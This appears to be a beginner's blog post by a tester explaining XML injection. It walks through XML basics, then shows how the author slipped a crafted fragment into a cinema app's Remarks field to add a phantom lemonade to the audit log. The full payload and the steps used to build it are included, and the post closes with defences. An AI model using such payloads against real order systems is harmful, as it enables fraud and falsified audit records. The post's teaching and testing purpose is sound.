XML Injection For Beginners

Suppose I sent one of my kids to the supermarket with a shopping list. Afterwards I got all the things on the list and the change. How would I know that everything went right?

If there was a discount on an article, then I would get more money back. Or my loyalty card could have been used to get free candy.

The best way is to look at the bill, the money, and the bought items. This is audit in a nutshell.

If you use a screen reader, please configure the screen reader to read interpunctions and symbols aloud.

XML uses special characters like the greater sign (>) and the less than sign (<).

Info about XML basics

The problem with an experience report is, that I make huge jumps in my thoughts. So I put in some chapters with more details. For people unfamiliar with XML, I put “Info about” in the title.

Let me introduce an imaginary small company.
Grey Pizza Pasta is an Italian restaurant which recycles pizzas in pasta. To make it special the pasta is grey for some special reason. It began as a joke and now it is a business.

A big scoop of pasta will cost 3 Euro. What is a scoop?
If it looks like a spoon, can I put a top of pasta on it? What kind of tool can I use to measure it? How do you determine the right amount of pasta?

Mister Grey would like make a row of pasta on the shelf, but which are the first and last ones? How could you tag them?

Maybe it would be better to make small heaps of pasta. The space between the heaps is like a boundary. The pasta between the spaces has been weighted.

According to Wikipedia XML or eXtensible Markup Language is a markup language that defines a set of rules for encoding documents in a format that is both human-readable and machine-readable.

In XML a heap of pasta could be described as follows:

<heap>pasta</heap>

<heap> is called a begin tag. You might call it a starting point.

  • It starts with< or smaller than sign.
  • heap is the description, what it represents.
  • > or greater than sign ends the tag.

</heap> is called an end tag. You might call it an end point. It almost looks like the begin tag. Only a forward slash or / is used before heap.

So everything between <heap> and </heap> is contained in the heap. This is called an element in XML. <heap>pasta</heap> can be described as a heap of pasta.

Is every tag name allowed?
Not really, because it must be defined in an XML Schema. In most cases an XML file can be read using common sense or domain knowledge. The last one is knowledge about the product or service being offered.

It is very important to write the end tag.

<heap>pasta chocolate milk

would be converted to a heap of pasta, chocolate, and milk. This is a tough one to imagine. Even for me.

Maybe Mister Grey would have intended a heap of pasta, a heap of chocolate, and a cup of milk.

This would lead to the following code:

<heap>pasta</heap>
<heap>chocolate</heap>
<cup>milk</cup>

Even a kid can imagine these things.

Stumbling over XML

The following story is based on a real story. All references to real companies have been changed.

During a regression test I was requested to look at the audit log. So I opened the VIP Cinema app and bought a ticket for Monsters Unlimited, Potato chips, and a Cola.

My next step was to look at the audit log. I opened the file and saw plain English. So it was easy to understand. It contained my movie ticket, my snack, and my drink.

Being curious I scrolled down. The se­­­­cond part of the file contained XML or Extensible Markup Language. And my head filled with one big question mark.

<item>
  <qty>1</qty>
  <name>potato chips</name>
  <remarks></remarks>
</item>
<item>
  <qty>1</qty>
  <name>cola</name>
  <remarks></remarks>
</item>

At least I recognized my bought items. I ordered 1 cola. The quantity is 1, so qty is short for quantity. So the quantity is shown between <qty> and </qty>.

Now I had an audit log with the first part in plain English and the second part in XML. It looked like that the XML was translated to plain English for the audit. If an auditor would read this, then she or he would understand what happened.

I wanted to test my assumption, that the XML was translated to plain English.

Info about nesting XMl elements

There is a problem with the heaps of pasta. It looks nice, but people would like to have a box or bag containing pasta. Mister Grey being minimalistic again wanted to make a grey paper box. The colour grey was chosen was for an obvious reason.

<box>pasta</box>

This XML code is quite confusing. What does the box contain actually? What is the weight of the content of the box? What are the ingredients?

This could lead to the following XML code

<box>pasta</box>
<weight>230 gram</weight>
<ingredients>flour, salt, water, cheese, tomato sauce, pepperoni</ingredients>

Looking at the shelf I would expect to see a box, a weight, and ingredients. But there is only a box on the shelf.

In XML it is possible to nest elements in other elements. E.g. on the box a name of the product, a weight, and ingredients are shown.

<box>
  <name>pasta</name>
  <weight>230 gram</weight>
  <ingredients>flour, salt, water, cheese, tomato sauce, pepperoni</ingredients>
</box>

SQL Injection

My Inner Exploratory Tester woke up. I looked at the code and saw <remarks>. Remarks are used for extra information, which contains requests from the customer.

I would like my Cola in a special cup by adding “a cup with a blue furry print” in the Remarks field.

SQL or Structured Query Language is frequently used language to change data. My order would be like:
“Computer, add 1 ticket for Monster Unlimited, 1 Potato chips, and 1 Cola to my order.”

Remarks can also be used by hackers for bad things. I remembered SQL injection. A hacker could add the command in the Remarks Field:
“Computer, add 1 lemonade to my order.”
On my arrival in the cinema I get a free lemonade. This is SQL injection in a nutshell.

SQL injection is adding SQL code which will add wrong information to the system. In turn this can be misused.

SQL is a language like XML. So the injection should also be possible with XML.

Info about adding code

This was the code I would like to modify.

<item>
  <qty>1</qty>
  <name>cola</name>
  <remarks></remarks>
</item>

If I would enter “XML code” in the Remarks field, then the following code would be generated:

<item>
  <qty>1</qty>
  <name>cola</name>
  <remarks>XML code</remarks>
</item>

Now I used known XML code to put in the Remarks field. This piece of code has the right structure.

<item>
  <qty>2</qty>
  <name>potato chips</name>
  <remarks></remarks>
</item>

If I would put the XML code for the potato chips in the remarks element of the cola, then I would get something like:

<item>
  <qty>1</qty>
  <name>cola</name>
  <remarks>
    <item>
      <qty>2</qty>
      <name>potato chips</name>
      <remarks></remarks>
    </item>
  </remarks>
</item>

The program would try to match begin tags with end tags.

If an end tag is found, then it will be matched with the corresponding begin tag before it.
A simple case is the following line:

<qty>1</qty>

</qty> is an end tag. The first begin tag is <qty>. qty or quantity is 1, because 1 is between the <qty> and </qty>.

Now it was time to match <item> with the right </item>.

<item>
  <qty>1</qty>
  <name>cola</name>
  <remarks>
    <item>
      <qty>2</qty>
      <name>potato chips</name>
      <remarks></remarks>
    </item>
  </remarks>
</item>

The code had 2 elements: an element about cola and an element about potato chips. Let me try to tell me what this means: 1 cola has remarks containing 2 potato chips. This looked promising. Let’s have a closer look at the Remarks element of the cola Item element.

 <remarks>
  <item>
    <qty>2</qty>
    <name>potato chips</name>
    <remarks></remarks>
  </item>
</remarks>

Is it possible that a Remarks element has a nested item element?
Probably not. Most of the time this is bad syntax and the XML code will not be processed. A Remarks field should contain text and should not nest elements in XML.

Info about writing the proper code

This section has been added to illustrate my train of thoughts which took a few seconds during the test. It took me some time to get the experience for writing the XML code.

What I wanted to order

For my test I wanted to change the XML code. I really wanted to have this piece of XML code in the audit log:

<item>
  <qty>1</qty>
  <name>cola</name>
  <remarks>
  </remarks>
</item>
<item>
  <qty>1</qty>
  <name>lemonade</name>
  <remarks>
  </remarks>
</item>

My first order attempt

A Remarks field can contain text. So the first line in the remarks field would be </remarks>. I marked this with the line:

<!-- Begin added code -->

This is a XML comment with the text ” Begin added code “. A program which processes XML code, will ignore this line. Comments are useful for programmers and testers.

<item>
<qty>1</qty>
  <name>cola</name>
  <remarks>
  <!-- Begin added code -->
  </remarks>
</item>
<item>
  <qty>1</qty>
  <name>lemonade</name>
  <remarks>
  </remarks>
</item>

Time for trial and error. I had to select a piece of code, I picked the line before to the line with a remarks begin tag. I marked this with the line <!– End added code –>. This is also an XML comment.

<item>
  <qty>1</qty>
  <name>cola</name>
  <remarks>
    <!-- Begin added code -->
  </remarks>
  </item>
  <item>
    <qty>1</qty>
    <name>lemonade</name>
    <!-- End added code -->
    <remarks>
    </remarks>
</item>

My thought was to put the following text in the Remarks field:

<!-- Begin added code -->
  </remarks>
  </item>
  <item>
    <qty>1</qty>
    <name>lemonade</name>
    <!-- End added code -->
</item>

In turn this should lead to the following code:

<item>
  <qty>1</qty>
  <name>cola</name>
  <remarks>
    <!-- Begin added code -->
  </remarks>
  </item>
  <item>
    <qty>1</qty>
    <name>lemonade</name>
    <!-- End added code -->
    <remarks>
    </remarks>
</item>

But the generated code was different:

<item>
  <qty>1</qty>
  <name>cola</name>
  <remarks>
  <!-- Begin added code -->
  </remarks>
  </item>
  <item>
    <qty>1</qty>
    <name>lemonade</name>
    <!-- End added code -->
  </remarks>
</item>

I noticed that <remarks> under the line <!– End added code –> was not contained in the generated code. I counted only 1 <remarks> instead of 2 <remarks> or begin remarks tag.

At that moment there was only 1 proper pair of <remarks> and </remarks>. This was wrong. For good XML code the number of begin tags is equal to the number of end tags.

My second order attempt

Another trial and error. I could choose the line before the line with the end tag of remarks.

<item>
  <qty>1</qty>
  <name>cola</name>
  <remarks>
  <!-- Begin added code -->
  </remarks>
  </item>
  <item>
    <qty>1</qty>
    <name>lemonade</name>
    <remarks>
   <!-- End added code -->
  </remarks>
</item>

A simple way to determine whether the XML code is right, that the piece of code has the same number of end tags as the number of begin tags:

<!-- Begin added code -->
</remarks>
</item>
<item>
  <qty>1</qty>
  <name>lemonade</name>
  <remarks>
<!-- End added code -->

For people with more time on their hands, there are other ways to derive the code.

XML injection in action

Because of the desert scene of Monsters Unlimited, visitors usually order extra drinks. I had the right XML code for this purpose:

<!-- Begin added code -->
</remarks>
</item>
<item>
  <qty>1</qty>
  <name>lemonade</name>
  <remarks>
<!-- End added code -->

In order to show the use of this code I added the XML comment with “Begin added code” or <!– End added code –>.

I placed this code in the Remarks field of my Cola order and the App made the following XML code:

<item>
  <qty>1</qty>
  <name>cola</name>
  <remarks>
  <!-- Begin added code -->.
  </remarks>
</item>
<item>
  <qty>1</qty>
  <name>lemonade</name>
  <remarks>
  <!-- End added code -->.
  </remarks>
</item>

This XML injection led to the following piece in plain English in the audit trail:
1 cola
1 lemonade

I was quite pleased with my successful data manipulation on my first try. For the price of 1 cola I got 1 cola and 1 lemonade according the audit log. Two drinks for the price of one.

In the cinema I only would get a cola. This was the only drink in my order. The lemonade mentioend in the remarks was not included in the order. But a lemonade was still in the audit log.

What is the deal?
In this case someone would have a lemonade for free. The drink was already included in the log.

What would happen, if an expensive collectible gold cup is added to my order?
Someone could take this cup home for free. One cup for the price of none.

Solutions to prevent XML injection

As a tester I had two solutions:

  1. Limit the number of characters in the Remarks field.
    This way the bad XML code would be reduced or even prevented.
  2. Train the employees of the cinema.
    If they could detect strange text in the Remarks field, then there was a chance on an attack of a hacker.

The developers were quite strict: prevent the use of < and > in the Remarks field.

If you use a screen reader, please set the screen reader to the normal reading mode.

Summary

Data is not about what is stored, but how it is used,

XML injection is adding XML code which will add wrong information to the system. In turn this can be misused.